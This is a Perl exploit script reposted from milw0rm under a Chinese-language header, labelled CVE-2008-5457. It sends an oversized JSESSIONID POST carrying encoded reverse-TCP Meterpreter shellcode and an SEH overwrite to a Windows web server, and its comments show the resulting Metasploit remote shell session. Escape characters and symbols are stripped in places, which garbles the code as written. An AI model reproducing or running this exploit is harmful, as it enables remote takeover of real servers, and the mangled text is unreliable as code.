信息起源:milw0rm.
复制内容到剪贴板
代码:#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe 02/16/2009 CVE20085457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework3.2 # ./msfcli multi/handler PAYLOADwindows/reflectivemeterpreter/reverse_tcp LHOST10.10.10.1 LPORT80 E
# ... Please wait while we load the module tree...
# ... Handler binding to LHOST 0.0.0.0
# ... Started reverse handler
# ... Starting the payload handler...
# ... Transmitting intermediate stager for oversized stage...(191 bytes)
# ... Sending stage (75776 bytes)
# ... Meterpreter session 1 opened (10.10.10.1:80 10.10.10.4:2171)
#
# meterpreter rev2self
# meterpreter execute i f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Windows .Version 5.2.3790.
# (C) Copyright 19852003 Microsoft Corp.
#
# c:windowssystem32inetsrv
# LHOST10.10.10.1 LPORT80
# windows/reflectivemeterpreter/reverse_tcp
# ... x86/alpha_mixed succeeded, final size 619
my shellcode
"xd9xecxd9x74x24xf4x5bx53x59x49x49x49x49x49" .
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x4bx4cx4bx58x46x36x45x50x45x50x43" .
"x30x50x53x46x35x51x46x51x47x4cx4bx42x4cx47" .
"x54x44x58x4cx4bx50x45x47x4cx4cx4bx51x44x43" .
"x35x44x38x45x51x4bx5ax4cx4bx50x4ax45x48x4c" .
"x4bx51x4ax47x50x43x31x4ax4bx4bx53x50x32x51" .
"x59x4cx4bx47x44x4cx4bx45x51x4ax4ex50x31x4b" .
"x4fx4bx4cx50x31x49x50x4ex4cx47x48x4dx30x43" .
"x44x44x47x49x51x48x4fx44x4dx43x31x49x57x4a" .
"x4bx4bx42x47x4bx43x4cx47x54x42x34x44x35x4b" .
"x51x4cx4bx51x4ax47x54x45x51x4ax4bx43x56x4c" .
"x4bx44x4cx50x4bx4cx4bx51x4ax45x4cx45x51x4a" .
"x4bx4cx4bx43x34x4cx4bx45x51x4ax48x4ax4bx43" .
"x32x50x31x49x50x51x4fx51x4ex51x4dx51x4bx48" .
"x42x45x58x43x30x51x4ex42x4ax46x50x51x49x43" .
"x54x4cx4bx42x39x4cx4bx51x4bx44x4cx4cx4bx51" .
"x4bx45x4cx4cx4bx45x4bx4cx4bx51x4bx44x48x51" .
"x43x45x38x4cx4ex50x4ex44x4ex4ax4cx4bx4fx4e" .
"x36x4dx59x48x47x46x33x45x38x46x34x48x4ax4e" .
"x4fx4cx51x4bx4fx49x46x4dx51x4ax4cx45x50x43" .
"x31x43x30x45x50x50x50x46x37x46x36x51x43x4d" .
"x59x4dx35x4dx38x45x4fx43x30x45x50x43x30x4a" .
"x30x43x31x43x30x45x50x48x36x45x49x42x38x4d" .
"x37x49x34x42x39x42x50x4dx39x4ax4cx4cx39x4e" .
"x4ax43x50x48x59x45x59x4ax55x4ex4dx48x4bx4a" .
"x4dx4bx4cx47x4bx51x47x50x53x46x52x51x4fx46" .
"x53x46x52x45x50x51x4bx4cx4dx50x4bx42x38x46" .
"x31x4bx4fx48x57x4bx39x49x4fx4bx39x48x43x4c" .
"x4dx44x35x44x54x43x5ax45x55x50x59x46x31x46" .
"x33x4bx4fx46x54x4cx4fx4bx4fx50x55x44x44x51" .
"x49x4cx49x44x44x4cx4ex4bx52x4bx42x46x4bx47" .
"x57x50x54x4bx4fx50x37x4bx4fx46x35x51x38x46" .
"x51x49x50x50x50x46x30x46x30x46x30x47x30x46" .
"x30x47x30x50x50x4bx4fx51x45x51x34x4bx39x48" .
"x47x45x38x44x4ax45x5ax44x4ax45x51x43x58x44" .
"x42x45x50x45x50x46x30x4bx39x4dx31x43x5ax42" .
"x30x46x31x51x47x4bx4fx50x55x51x30x43x5ax51" .
"x50x51x4ex46x36x49x51x4ax46x45x56x51x46x49" .
"x51x4ax46x44x48x46x36x43x5ax45x50x4bx4fx46" .
"x35x44x4cx4dx59x49x53x42x4ax43x30x50x56x51" .
"x43x50x57x4bx4fx46x35x44x58x4bx4fx48x53x44" .
"x4ax41x41";
use warnings;
use strict;
use I:Socket::INET;
my sock I:Socket::INET new(PeerAddr \'10.10.10.4\', PeerPort \'80\', Proto \'tcp\');
print sock "POST /index.jsp;JSESSIONID" .
"B" x 5132 .
shellcode .
"C" x (3000length( shellcode)) .
"xe9x43xf4xffxff" . # jmp back
"x90x90xebxf7" . # jmp back
"x76x79" . # SEH partial rewrite
" HTTP/1.0rn" .
"Connection:KeepAlivern" .
"ContentLength: 81rnrn" . "A" x 81 . "rn";